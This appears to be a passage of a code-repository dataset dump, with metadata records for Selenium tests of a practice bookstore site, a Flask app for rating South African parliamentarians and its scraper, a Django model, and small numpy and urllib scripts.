driver.find_element(By.CSS_SELECTOR, '#wpmenucartli > a')\ncart.click()\nwait = WebDriverWait(driver,5)\nCheckout_btn = wait.until(\n EC.element_to_be_clickable((By.CLASS_NAME, 'checkout-button'))\n)\nCheckout_btn.click()\nwait.until(\n EC.url_to_be('http://practice.automationtesting.in/checkout/')\n)\nfirst_name = driver.find_element(By.ID, 'billing_first_name')\nfirst_name.send_keys('Galina')\nlast_name = driver.find_element(By.ID, 'billing_last_name')\nlast_name.send_keys('Fedorova')\nemail = driver.find_element(By.ID, 'billing_email')\nemail.send_keys('[email protected]')\nphone = driver.find_element(By.ID, 'billing_phone')\nphone.send_keys('89991234567')\ncountry_selector = driver.find_element(By.ID, 's2id_billing_country')\ncountry_selector.click()\ntime.sleep(1)\ncountry_enter = driver.find_element(By.ID, 's2id_autogen1_search')\ncountry_enter.send_keys('Russia')\ncountry_srch_result = driver.find_element(By.ID, 'select2-results-1')\ncountry_srch_result.click()\nadress = driver.find_element(By.ID, 'billing_address_1')\nadress.send_keys('Nevskiy prospect')\ncity = driver.find_element(By.ID, 'billing_city')\ncity.send_keys('Saint-Petersburg')\nstate = driver.find_element(By.ID, 'billing_state')\nstate.send_keys('Saint-Petersburg')\npostcode = driver.find_element(By.ID, 'billing_postcode')\npostcode.send_keys('177888')\ndriver.execute_script('window.scrollBy(0,600);')\ntime.sleep(3)\ncheck_payments = driver.find_element(By.ID,'payment_method_cheque')\ncheck_payments.click()\nplace_order_btn = driver.find_element(By.ID, 'place_order')\nplace_order_btn.click()\nthanks_text_check = wait.until(\n EC.text_to_be_present_in_element((By.ID, 'body'),'Thank you. Your order has been received.')\n)\npayment_method_check = wait.until(\n EC.text_to_be_present_in_element((By.CSS_SELECTOR, '#page-35 tfoot > tr:nth-child(3) > td'), 'Check Payments')\n)\n\ndriver.quit()\n" }, { "alpha_fraction": 0.7213872671127319, "alphanum_fraction": 0.7421965599060059, "avg_line_length": 33.63999938964844, "blob_id": "7877d9df55d61d6e8bd0172497d334e1fe9d2313", "content_id": "2b5f977cec2c615b1f57581ee22e713a421cb7c8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 865, "license_type": "no_license", "max_line_length": 109, "num_lines": 25, "path": "/home.py", "repo_name": "iamgalina/book_store_tests", "src_encoding": "UTF-8", "text": "import time\nfrom selenium import webdriver\ndriver = webdriver.Chrome()\ndriver.maximize_window()\nfrom selenium.webdriver.common.by import By\ndriver.implicitly_wait(5)\n\ndriver.get(\"http://practice.automationtesting.in/\")\ndriver.execute_script(\"window.scrollBy(0,600);\")\nRuby_book = driver.find_element(By.CSS_SELECTOR, \"#text-22-sub_row_1-0-2-0-0 .woocommerce-LoopProduct-link\")\nRuby_book.click()\nReview = driver.find_element(By.CSS_SELECTOR, \"#product-160 li.reviews_tab > a\")\nReview.click()\nStar_5 = driver.find_element(By.CLASS_NAME, \"star-5\")\nStar_5.click()\nReview_text = driver.find_element(By.ID,\"comment\")\nReview_text.send_keys(\"Nice Book!\")\nName = driver.find_element(By.ID, \"author\")\nName.send_keys(\"Galina\")\nemail = driver.find_element(By.ID, \"email\")\nemail.send_keys(\"[email protected]\")\nsubmit = driver.find_element(By.ID, \"submit\")\nsubmit.click()\n\ndriver.quit()" }, { "alpha_fraction": 0.7323750853538513, "alphanum_fraction": 0.7412731051445007, "avg_line_length": 35.54999923706055, "blob_id": "36cf108b4c1b21f300174a7d915bf012b24bb6b2", "content_id": "71614dfc328e18a832598687e749dfe5380e5719", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1486, "license_type": "no_license", "max_line_length": 148, "num_lines": 40, "path": "/login_registation.py", "repo_name": "iamgalina/book_store_tests", "src_encoding": "UTF-8", "text": "import time\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.support.ui import WebDriverWait\n\ndriver = webdriver.Chrome()\ndriver.maximize_window()\ndriver.implicitly_wait(10)\n\ndriver.get(\"http://practice.automationtesting.in/\")\nmy_acc = driver.find_element_by_css_selector(\"#menu-item-50 > a\")\nmy_acc.click()\nreg_email = driver.find_element(By.ID, \"reg_email\")\nreg_email.send_keys(\"[email protected]\")\nreg_pswd = driver.find_element(By.ID, \"reg_password\")\nreg_pswd.send_keys(\"Pr-Ac-Ti-Ce\")\nwait = WebDriverWait(driver, 20)\nregister = wait.until(\n EC.element_to_be_clickable((By.CSS_SELECTOR, \"#customer_login p.woocomerce-FormRow.form-row > input.woocommerce-Button.button\"))\n )\nregister.click()\ndriver.quit()\n\ndriver.get(\"http://practice.automationtesting.in/\")\nmy_acc = driver.find_element_by_css_selector(\"#menu-item-50 > a\")\nmy_acc.click()\nlogin = driver.find_element(By.ID, \"username\")\nlogin.send_keys(\"[email protected]\")\npswd = driver.find_element(By.ID, \"password\")\npswd.send_keys(\"Pr-Ac-Ti-Ce\")\nwait = WebDriverWait(driver, 20)\nlog_btn = wait.until(\n EC.element_to_be_clickable((By.CSS_SELECTOR, \"#customer_login > div.u-column1.col-1 > form > p:nth-child(3) > input.woocommerce-Button.button\"))\n)\nlog_btn.click()\n#Проверка, что на странице есть Logout\nlogout = driver.find_element(By.LINK_TEXT, \"Logout\")\nassert logout.text == 'Logout'\ndriver.quit()" }, { "alpha_fraction": 0.7318676114082336, "alphanum_fraction": 0.7558929920196533, "avg_line_length": 45.44210433959961, "blob_id": "a0e46760d2a95d27a9151109af2722548cf32236", "content_id": "880688f3f638c6cfe4aeb361c4eb2353fd36ae98", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 6699, "license_type": "no_license", "max_line_length": 115, "num_lines": 95, "path": "/README.md", "repo_name": "iamgalina/book_store_tests", "src_encoding": "UTF-8", "text": "# Задание по курсу \"Основы автоматизации тестирования на Python с помощью Selenium\"\n### Шаги, по которым был написан код:\n* Home: добавление комментария\n> 1. Откройте http://practice.automationtesting.in/\n> 2. Проскролльте страницу вниз на 600 пикселей\n> 3. Нажмите на название книги \"Selenium Ruby\" или на кнопку \"READ MORE\"\n> 4. Нажмите на вкладку \"REVIEWS\"\n> 5. Поставьте 5 звёзд\n> 6. Заполните поле \"Review\" сообщением : \"Nice book!\"\n> 7. Заполните поле \"Name\"\n> 8. Заполните \"Email\"\n> 9. Нажмите на кнопку \"SUBMIT\"\n\n* Registration_login: регистрация аккаунта\n> 1.\tОткройте http://practice.automationtesting.in/\n> 2.\tНажмите на вкладку \"My Account Menu\"\n> 3.\tВ разделе \"Register\", введите email для регистрации\n> 4.\tВ разделе \"Register\", введите пароль для регистрации \\n\n>> * составьте такой пароль, чтобы отобразилось \"Medium\" или \"Strong\", иначе регистрация не выполнится\n> 5.\tНажмите на кнопку \"Register\"\n\n* Registration_login: логин в систему\n> 1.\tОткройте http://practice.automationtesting.in/\n> 2.\tНажмите на вкладку \"My Account Menu\"\n> 3.\tВ разделе \"Login\", введите email для логина #данные можно взять из предыдущего теста\n> 4.\tВ разделе \"Login\", введите пароль для логина\t#данные можно взять из предыдущего теста\n> 5.\tНажмите на кнопку \"Login\"\n> 6.\tДобавьте проверку, что на странице есть элемент \"Logout\"\n\n* Shop: отображение страницы товара \n> 1.\tОткройте http://practice.automationtesting.in/\n> 2.\tЗалогиньтесь\n> 3.\tНажмите на вкладку \"Shop\"\n> 4.\tОткройте книгу \"HTML 5 Forms\"\n> 5.\tДобавьте тест, что заголовок книги назвается: \"HTML5 Forms\"\n\n* Shop: количество товаров в категории\n> 1.\tОткройте http://practice.automationtesting.in/\n> 2.\tЗалогиньтесь\n> 3.\tНажмите на вкладку \"Shop\"\n> 4.\tОткройте категорию \"HTML\"\n> 5.\tДобавьте тест, что отображается три товара\n\n* Shop: сортировка товаров\n> 1.\tОткройте http://practice.automationtesting.in/\n> 2.\tЗалогиньтесь\n> 3.\tНажмите на вкладку \"Shop\"\n> 4.\tДобавьте тест, что в селекторе выбран вариант сортировки по умолчанию\n> 5.\tОтсортируйте товары от большего к меньшему\n> 6.\tСнова объявите переменную с локатором основного селектора сортировки #т.к после сортировки страница обновится\n> 7.\tДобавьте тест, что в селекторе выбран вариант сортировки от большего к меньшему\n\n* Shop: отображение, скидка товара\n> 1.\tОткройте http://practice.automationtesting.in/\n> 2.\tЗалогиньтесь\n> 3.\tНажмите на вкладку \"Shop\"\n> 4.\tОткройте книгу \"Android Quick Start Guide\"\n> 5.\tДобавьте тест, что содержимое старой цены = \"₹600.00\"\t\n> 6.\tДобавьте тест, что содержимое новой цены = \"₹450.00\"\t\n> 7.\tДобавьте явное ожидание и нажмите на обложку книги\n> 8.\tДобавьте явное ожидание и закройте предпросмотр нажав на крестик (кнопка вверху справа)\n\n* Shop: проверка цены в корзине\n> 1.\tОткройте http://practice.automationtesting.in/\t\n> 2.\tНажмите на вкладку \"Shop\"\n> 3.\tДобавьте в корзину книгу \"HTML5 WebApp Development\"\t\n> 4.\tДобавьте тест, что в возле коризны(вверху справа) количество товаров = \"1 Item\", а стоимость = \"₹180.00\"\n> 5.\tПерейдите в корзину\n> 6.\tИспользуя явное ожидание, проверьте что в Subtotal отобразилась стоимость\n> 7.\tИспользуя явное ожидание, проверьте что в Total отобразилась стоимость\n\n* Shop: работа в корзине\n> 1.\tОткройте http://practice.automationtesting.in/\t\n> 2.\tНажмите на вкладку \"Shop\"\n> 3.\tДобавьте в корзину книги \"HTML5 WebApp Development\" и \"JS Data Structures and Algorithm\"\n> 4.\tПерейдите в корзину\n> 5.\tУдалите первую книгу\n> 6.\tНажмите на Undo (отмена удаления)\n> 7.\tВ Quantity увеличьте количесто товара до 3 шт для \"JS Data Structures and Algorithm“\n> 8.\tНажмите на кнопку \"UPDATE BASKET\"\n> 9.\tДобавьте тест, что value элемента quantity для \"JS Data Structures and Algorithm\" равно 3\t# используйте assert\n> 10.\tНажмите на кнопку \"APPLY COUPON\"\n> 11.\tДобавьте тест, что возникло сообщение: \"Please enter a coupon code.\"\n\n* Shop: покупка товара\n> 1.\tОткройте http://practice.automationtesting.in/\t# в этом тесте логиниться не нужно\n> 2.\tНажмите на вкладку \"Shop\" и проскролльте на 300 пикселей вниз\n> 3.\tДобавьте в корзину книгу \"HTML5 WebApp Development\"\n> 4.\tПерейдите в корзину\n> 5.\tНажмите \"PROCEED TO CHECKOUT\"\n> 6.\tЗаполните все обязательные поля\n> 7.\tВыберите способ оплаты \"Check Payments\"\n> 8.\tНажмите PLACE ORDER\n> 9.\tИспользуя явное ожидание, проверьте что отображается надпись \"Thank you. Your order has been received.\"\n> 10.\tИспользуя явное ожидание, проверьте что в Payment Method отображается текст \"Check Payments\"\n" } ]
4
wanwey/bsmsystem
https://github.com/wanwey/bsmsystem
637dd3dc071ae3d38c14811b42a5853ef567731b
d316a3ca84c2edfb245941ace3a6dc86f9d9c4b2
901cd1d09a725a283735471ab601626e7befb3ab
refs/heads/master
2018-10-12T17:21:46.739420
2018-07-18T03:20:58
2018-07-18T03:20:58
140,454,755
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7286821603775024, "alphanum_fraction": 0.7286821603775024, "avg_line_length": 20.66666603088379, "blob_id": "e6fec2e73d47889e80625880d9fdcd5912815066", "content_id": "a8b9fa7e4b0d0d3c4a78bcdbad08a8b985c903ff", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 129, "license_type": "no_license", "max_line_length": 61, "num_lines": 6, "path": "/backend/urls.py", "repo_name": "wanwey/bsmsystem", "src_encoding": "UTF-8", "text": "from django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('getassetdata', views.getassetdata, name='getdata'),\n]" }, { "alpha_fraction": 0.7535934448242188, "alphanum_fraction": 0.755646824836731, "avg_line_length": 29.4375, "blob_id": "5ee6ed8b6a7863837b4e65ead6bf4fc2e5c110e5", "content_id": "bdb6ecab2dfb6ab5bc2ff3a8e603a8dfc5906287", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 487, "license_type": "no_license", "max_line_length": 69, "num_lines": 16, "path": "/backend/views.py", "repo_name": "wanwey/bsmsystem", "src_encoding": "UTF-8", "text": "from django.shortcuts import render\nfrom django.http import HttpResponse\nfrom backend import models\nimport json\nfrom django.http import JsonResponse\nfrom rest_framework import serializers\n\n# def index(request):\n# return HttpResponse(\"Hello, world. You're at the polls index.\")\n\ndef getassetdata(request):\n result = models.bs_asset.objects.all()\n # filter(v_assetstate_id=1)\n result = serializers.serialize(\"json\", result)\n return result\n # return JsonResponse(result)\n" }, { "alpha_fraction": 0.7142857313156128, "alphanum_fraction": 0.7373272180557251, "avg_line_length": 23.22222137451172, "blob_id": "a137db9443ebae19c44b2a7d50903ba328edfb3e", "content_id": "8857a2971ddeda2a1f3fa48eec05491828eaf433", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 217, "license_type": "no_license", "max_line_length": 53, "num_lines": 9, "path": "/backend/models.py", "repo_name": "wanwey/bsmsystem", "src_encoding": "UTF-8", "text": "from django.db import models\n\n# Create your models here.\n\n\nclass bs_asset(models.Model):\n id = models.AutoField\n assetcode = models.CharField(max_length=255)\n v_assetstate_id = models.IntegerField(default=75)" } ]
3
OpenUpSA/pa-hotness
https://github.com/OpenUpSA/pa-hotness
60c441a5d804d4617bf81d04c5a37097711d5069
40a9b55fbc76139348c1f7287665c2585935e71d
f2fd9f4487eca43409fde69cd97b3f2f1df41f3c
refs/heads/master
2023-04-27T18:32:25.802069
2014-04-11T05:18:39
2014-04-11T05:18:39
18,554,862
0
0
Apache-2.0
2014-04-08T10:55:02
2017-05-24T14:08:48
2023-04-15T18:48:00
Python
[ { "alpha_fraction": 0.7236841917037964, "alphanum_fraction": 0.7236841917037964, "avg_line_length": 37.5, "blob_id": "0f99959adadbf2f04e9c532e2528b200f20cb691", "content_id": "90dc81132bee4a0d21ae4ab77bc90f80843ce459", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 76, "license_type": "permissive", "max_line_length": 63, "num_lines": 2, "path": "/instance/config.py", "repo_name": "OpenUpSA/pa-hotness", "src_encoding": "UTF-8", "text": "DEBUG = True\nSQLALCHEMY_DATABASE_URI = 'sqlite:///../instance/pa-hotness.db'" }, { "alpha_fraction": 0.6226269006729126, "alphanum_fraction": 0.6292135119438171, "avg_line_length": 24.81999969482422, "blob_id": "d3f930255756bc52acb565177983b610add5368b", "content_id": "03132e7a30277ab37c533024b799d40fe5c03267", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2581, "license_type": "permissive", "max_line_length": 118, "num_lines": 100, "path": "/backend/views.py", "repo_name": "OpenUpSA/pa-hotness", "src_encoding": "UTF-8", "text": "from flask import Flask, jsonify, abort\nimport json\nfrom random import randint\nfrom operator import itemgetter\nfrom flask.ext.sqlalchemy import SQLAlchemy\nfrom sqlalchemy.sql import func\n\n\napp = Flask(__name__, instance_relative_config=True)\napp.config.from_pyfile('config.py', silent=True)\ndb = SQLAlchemy(app)\n\nfrom models import MemberOfParliament\n\n\ndef send_api_response(data_dict):\n\n response = jsonify(data_dict)\n response.headers['Access-Control-Allow-Origin'] = \"*\"\n return response\n\n\[email protected]('/')\ndef route():\n links = [\n '<a href=\"/get_member/male/\">/get_member/male/</a>',\n '<a href=\"/get_member/female/\">/get_member/female/</a>',\n '<a href=\"/hot/pamela-tshwete/\">/hot/pamela-tshwete/</a>',\n '<a href=\"/not/pamela-tshwete/\">/not/pamela-tshwete/</a>',\n '<a href=\"/ranking/\">/ranking/</a>'\n ]\n return \"<br>\".join(links)\n\n\[email protected]('/get_member/<gender>/')\ndef get_member(gender):\n \"\"\"\n Return the details of a randomly selected member of parliament.\n \"\"\"\n\n if not gender.lower() in [\"male\", \"female\"]:\n abort(400)\n\n gender_key = \"M\"\n if gender.lower() == \"female\":\n gender_key = \"F\"\n\n\n mp = MemberOfParliament.query.filter_by(gender=gender_key).order_by(func.random()).first()\n return send_api_response(mp.as_dict())\n\n\[email protected]('/hot/<mp_key>/')\ndef hot(mp_key):\n \"\"\"\n Increment the score for an MP.\n \"\"\"\n\n try:\n mp = MemberOfParliament.query.filter_by(key=mp_key).first()\n mp.score += 1\n except AttributeError:\n abort(404)\n db.session.add(mp)\n db.session.commit()\n return send_api_response(mp.as_dict())\n\n\[email protected]('/not/<mp_key>/')\ndef not_hot(mp_key):\n \"\"\"\n Decrement the score for an MP.\n \"\"\"\n\n try:\n mp = MemberOfParliament.query.filter_by(key=mp_key).first()\n mp.score -= 1\n except AttributeError:\n abort(404)\n db.session.add(mp)\n db.session.commit()\n return send_api_response(mp.as_dict())\n\[email protected]('/ranking/')\ndef ranking():\n \"\"\"\n Return the 10 highest ranked MP's of each gender.\n \"\"\"\n\n top_males = []\n top_females = []\n\n males = MemberOfParliament.query.filter_by(gender=\"M\").order_by(MemberOfParliament.score.desc()).limit(10).all()\n for mp in males:\n top_males.append(mp.as_dict())\n females = MemberOfParliament.query.filter_by(gender=\"F\").order_by(MemberOfParliament.score.desc()).limit(10).all()\n for mp in females:\n top_females.append(mp.as_dict())\n\n return send_api_response({\"male\": top_males, \"female\": top_females})" }, { "alpha_fraction": 0.6643990874290466, "alphanum_fraction": 0.6780045628547668, "avg_line_length": 32.92307662963867, "blob_id": "ba3ede07fbf641f53ed6d6e0d1642803bd035881", "content_id": "4f026bd29b02e0af1f2ef741d0646018de680b5b", "detected_licenses": [ "Apache-2.0", "MIT" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 441, "license_type": "permissive", "max_line_length": 91, "num_lines": 13, "path": "/frontend/controllers.js", "repo_name": "OpenUpSA/pa-hotness", "src_encoding": "UTF-8", "text": "var HotOrNotApp = angular.module(\"HotOrNotApp\", []);\n\nHotOrNotApp.controller(\"sexController\", function($scope) {\n\t$scope.sex = \"Men\";\n});\n\nHotOrNotApp.controller(\"peepsController\", function($scope, $http) {\n\t$http.get('http://hot-or-not-api.demo4sa.org/get_member/male/').success(function(peep1) {\n\t\t$http.get('http://hot-or-not-api.demo4sa.org/get_member/male/').success(function(peep2) {\n\t\t\t$scope.peeps = [ peep1, peep2 ];\n\t\t});\n\t});\n});\n" }, { "alpha_fraction": 0.7603305578231812, "alphanum_fraction": 0.7603305578231812, "avg_line_length": 30, "blob_id": "9b78f99a9662916322d18a29cb6b68f4db1d0fe4", "content_id": "df9e00ca96640b18c58387082fc2f5b5bcb9a491", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1210, "license_type": "permissive", "max_line_length": 119, "num_lines": 39, "path": "/README.md", "repo_name": "OpenUpSA/pa-hotness", "src_encoding": "UTF-8", "text": "pa-hotness\n================\n\n\"Hot or Not\" style app for getting to know your representatives in parliament. Information on candidates comes form the\nPeople's Assembly website at http://www.pa.org.za/organisation/national-assembly/people/\n\n\n## What does this project do\n\nLet people discover more information about their representatives in parliament, by having them rate parliamentarians.\nThe user is repeatedly confronted by a random parliamentarian's information, and asked to decide whether that\nparliamentarian is \"Hot\" or \"Not\".\n\nIn this way, parliamentarians are ranked, and the rankings are displayed on a different screen.\n\n## How it works\n\nThe frontend is ...\n\nThe backend exposes a couple of API endpoints, and a little Admin interface for managing the site's data.\n\n## Contributing to the project\n\nThis project is open-source, and anyone is welcome to contribute. If you just want to make us aware of a bug / make\na feature request, then please add a new GitHub Issue (if a similar one does not already exist).\n\nIf you want to contribute to the code, please fork the repository, make your changes, and create a pull request.\n\n### Local setup\n\n...\n\n### Deploy instructions\n\n...\n\n### Maintenance\n\n...\n\n" }, { "alpha_fraction": 0.6027397513389587, "alphanum_fraction": 0.6125244498252869, "avg_line_length": 23.35714340209961, "blob_id": "db575e357ee305327c0c68fba8cac2149a17a916", "content_id": "4fb96c187b36f30629ed11c0dc8d99927b2c5cdb", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1022, "license_type": "permissive", "max_line_length": 99, "num_lines": 42, "path": "/rebuild_db.py", "repo_name": "OpenUpSA/pa-hotness", "src_encoding": "UTF-8", "text": "import json\nimport csv\nfrom backend.views import db\nfrom backend.models import MemberOfParliament\n\n\ndef unicode_csv_reader(utf8_data, dialect=csv.excel, **kwargs):\n \"\"\"\n Handles special characters.\n Courtesy Alex Martelli (http://stackoverflow.com/questions/904041/reading-a-utf8-csv-file-with-python)\n \"\"\"\n csv_reader = csv.reader(utf8_data, dialect=dialect, **kwargs)\n for row in csv_reader:\n yield [unicode(cell, 'utf-8') for cell in row]\n\n\ndef parse_scraper_data():\n \"\"\"\n Read input data file, and save as a pickle.\n \"\"\"\n\n mp_list = []\n with open('scraper/out.csv','Ur') as f:\n # reader = csv.reader(f, delimiter=',')\n reader = unicode_csv_reader(f)\n for row in reader:\n print row\n tmp = MemberOfParliament(*row)\n mp_list.append(tmp)\n return mp_list\n\n\nif __name__ == \"__main__\":\n\n db.drop_all()\n db.create_all()\n\n mp_list = parse_scraper_data()\n for mp in mp_list:\n db.session.add(mp)\n\n db.session.commit()" }, { "alpha_fraction": 0.5755868554115295, "alphanum_fraction": 0.577464759349823, "avg_line_length": 26.30769157409668, "blob_id": "e43b5435e94cb6a9d1e071015a391bd45868ad98", "content_id": "ad6f0013354bf11a1d38bf762086d881dc339af4", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1065, "license_type": "permissive", "max_line_length": 100, "num_lines": 39, "path": "/backend/models.py", "repo_name": "OpenUpSA/pa-hotness", "src_encoding": "UTF-8", "text": "from sqlalchemy import Column, Integer, String\nfrom .views import db\n\n\nclass MemberOfParliament(db.Model):\n\n def __init__(self, url=None, profile_pic=None, name=None, detail=None, party=None, gender=None):\n self.url = url\n self.profile_pic = profile_pic\n self.name = name\n self.detail = detail\n self.party = party\n self.gender = gender\n if url:\n self.key = url.split('/')[-2]\n return\n\n __tablename__ = 'members'\n\n # columns\n pk = Column(Integer, primary_key=True)\n name = Column(String)\n gender = Column(String)\n url = Column(String)\n party = Column(String)\n profile_pic = Column(String)\n key = Column(String)\n score = Column(Integer, default=0)\n\n def __repr__(self):\n return \"<MemberOfParliament(pk='%s', name='%s')>\" % (\n str(self.pk), str(self.name))\n\n def as_dict(self):\n tmp = {c.name: getattr(self, c.name) for c in self.__table__.columns}\n del tmp['pk']\n del tmp['key']\n tmp['id'] = self.key\n return tmp\n" }, { "alpha_fraction": 0.5551871061325073, "alphanum_fraction": 0.5589767694473267, "avg_line_length": 25.658227920532227, "blob_id": "63a6ba078b85c5d0d0cd128998e39a8128f69c4c", "content_id": "07e7b3fdcf625e6c9334b18f26cb5250ad29cba5", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2111, "license_type": "permissive", "max_line_length": 124, "num_lines": 79, "path": "/scraper/scrape.py", "repo_name": "OpenUpSA/pa-hotness", "src_encoding": "UTF-8", "text": "import requests\nimport sys\nimport csv\nfrom bs4 import BeautifulSoup \nfrom urlparse import urljoin\n\nna_url = \"http://www.pa.org.za/organisation/national-assembly/people/\"\n\ndef guess_gender(name):\n if name.startswith(\"Mrs\") or name.startswith(\"Ms\"):\n return \"F\"\n elif name.startswith(\"Mr\"):\n return \"M\"\n else:\n print name\n print \"(M)ale or (F)emale?\"\n print \"\"\n val = raw_input()\n if val.lower() == \"m\":\n return \"M\"\n elif val.lower() == \"f\":\n return \"F\"\n return \"U\"\n\ndef list_pages():\n list_url = na_url\n while True:\n html = requests.get(list_url).content\n soup = BeautifulSoup(html)\n for item in soup.select(\".person-list-item a\"):\n url = item[\"href\"]\n if \"person\" in url:\n yield urljoin(na_url, url)\n\n next = soup.select(\"a.next\")\n if next:\n list_url = urljoin(na_url, next[0][\"href\"])\n else:\n break\n\ndef detail_page(url):\n html = requests.get(url).content\n soup = BeautifulSoup(html)\n\n profile_pic = soup.select(\"div.profile-pic img\")\n if profile_pic:\n profile_pic = urljoin(na_url, profile_pic[0][\"src\"])\n\n name = soup.select(\"div.title-space h1\")\n if name:\n name = name[0].text\n\n \n position_title = soup.select(\"span.position-title\")\n if position_title:\n position_title = position_title[0].text\n \n details = soup.select(\"div.constituency-party a\")\n party = details[0].text\n\n return {\n \"url\" : url,\n \"profile_pic\" : profile_pic,\n \"name\" : name,\n \"position_title\" : position_title,\n \"party\" : party,\n \"gender\" : guess_gender(name),\n }\n\nwriter = csv.writer(sys.stdout)\nwriter.writerow([\"url\", \"pic_url\", \"name\", \"position/title\", \"party\", \"gender\"])\ndef _(s):\n return s.encode(\"utf8\")\n\nfor url in list_pages():\n data = detail_page(url)\n writer.writerow([\n data[\"url\"], _(data[\"profile_pic\"]), _(data[\"name\"]), _(data[\"position_title\"]), _(data[\"party\"]), _(data[\"gender\"])\n ])\n \n" }, { "alpha_fraction": 0.7074829936027527, "alphanum_fraction": 0.7074829936027527, "avg_line_length": 23.66666603088379, "blob_id": "d317a30a12243dc94b1d82977e02d3077a375a22", "content_id": "766b492a91020225f0f28b88b1c113520d8ed05a", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 147, "license_type": "permissive", "max_line_length": 63, "num_lines": 6, "path": "/config/production/config.py", "repo_name": "OpenUpSA/pa-hotness", "src_encoding": "UTF-8", "text": "\"\"\"\nAdd any config variables here that don't have to be private.\n\"\"\"\n\nDEBUG = False\nSQLALCHEMY_DATABASE_URI = 'sqlite:///../instance/pa-hotness.db'" } ]
8
Yiiiii-tao/class
https://github.com/Yiiiii-tao/class
61c4f370f650fc0d718381ce20c56ce8d9a98e6a
9064877a840c27c0b0bcd46a6788452da8595bc1
3dc1e6a8821c06f6e33477ca7d542daf5fc8e856
refs/heads/master
2020-09-19T23:16:57.760241
2019-11-27T01:55:20
2019-11-27T01:55:20
224,321,075
1
0
null
null
null
null
null
[ { "alpha_fraction": 0.3977011442184448, "alphanum_fraction": 0.4850574731826782, "avg_line_length": 23.22222137451172, "blob_id": "7435ecb202553b9c563559516890fdc0dbb02aa8", "content_id": "27e358f749104345a29f520ef0a75036df5cb904", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 435, "license_type": "no_license", "max_line_length": 50, "num_lines": 18, "path": "/class6.py", "repo_name": "Yiiiii-tao/class", "src_encoding": "UTF-8", "text": "import numpy as np\ndef test():\n a = np.arange(15).reshape(3, 5)\n # a=np.array([[1,2,3],[4,5,6]],dtype=np.int16)\n # a=np.linspace(0,10,11)\n # a=np.zeros((3,5))#[[1,2,3]] != [1,2,3]\n # a=np.ones((3,5))\n # a=np.eye(3)*2\n # a=np.diag([2,3,4])\n # print(type(a))\n print(a)\n # print(a.shape,a.size,a.itemsize)\n # print(a*10+4)\n print(a[:2,1::2])\ndef main():\n test()\nif __name__ == '__main__':\n main()" }, { "alpha_fraction": 0.6004390716552734, "alphanum_fraction": 0.6048298478126526, "avg_line_length": 25.02857208251953, "blob_id": "cc2dfa28710c8c0eb3b226dcae6321f2806abff5", "content_id": "781c52486446698e39cfef14416353490525a2ef", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 927, "license_type": "no_license", "max_line_length": 68, "num_lines": 35, "path": "/urllib1.py", "repo_name": "Yiiiii-tao/class", "src_encoding": "UTF-8", "text": "\n# -*- coding:utf-8 -*-\n#获取并打印google首页的html\nimport urllib.request\nfrom bs4 import BeautifulSoup\nimport json\nfrom urllib.parse import urlparse\nimport time\n# print(bs)\n# print(html)\ndef getdata(r='http://www.nufe.edu.cn/'):\n response = urllib.request.urlopen(r)\n html = response.read()\n bs = BeautifulSoup(html, \"html.parser\")\ndef getinfo(bs):\n la = bs.find_all('a')\n res=[]\n for a in la:\n if len(a.text)>0 and a.get('href') and len(a.get('href'))>2:\n res.append(a.get('href'))\n return res\ndef save(url,res):\n dest_str=urlparse(url)\n with open('a.json','w') as f:\n json.dump(res,f)\ndef main():\n response = urllib.request.urlopen('http://www.nufe.edu.cn/')\n html = response.read()\n bs = BeautifulSoup(html, \"html.parser\")\n res=getinfo(bs)\n for r in res:\n if r.startswith('http'):\n\n print(r)\nif __name__ == '__main__':\n main()" }, { "alpha_fraction": 0.7738693356513977, "alphanum_fraction": 0.7839195728302002, "avg_line_length": 30.421052932739258, "blob_id": "8d101e83359d7584516c8eff5c9fb7cc09b0f1da", "content_id": "be352356ae590de36b72dab48adbbcf40fa7dada", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 597, "license_type": "no_license", "max_line_length": 77, "num_lines": 19, "path": "/helloworld/class3test.py", "repo_name": "Yiiiii-tao/class", "src_encoding": "UTF-8", "text": "import os\nfrom PIL import Image\nfrom skimage import exposure\nimport numpy as np\nimport matplotlib.pyplot as plt\nimg = Image.open('/home/vincent/Pictures/work/Unequalized_Hawkes_Bay_NZ.jpg')\nimg = np.array(img)\nimg_eq = exposure.equalize_hist(img)\nimg_adapteq = exposure.equalize_adapthist(img, clip_limit=0.04)\nplt.figure(0)\nplt.imshow(img)\nplt.title('low contrast image')\nplt.figure(1)\nplt.imshow(img_eq)\nplt.title('high constrast image using normal histogram equalization')\nplt.figure(2)\nplt.imshow(img_adapteq)\nplt.title('high constract image using adaptive histogram euqalization')\nplt.show()\n" }, { "alpha_fraction": 0.41564247012138367, "alphanum_fraction": 0.4569832384586334, "avg_line_length": 20.85365867614746, "blob_id": "f6c58999ed527eeb19e5e867a7a7738bd605d558", "content_id": "f69712023763c2ad176c0f9cdde4ade08970c98b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 907, "license_type": "no_license", 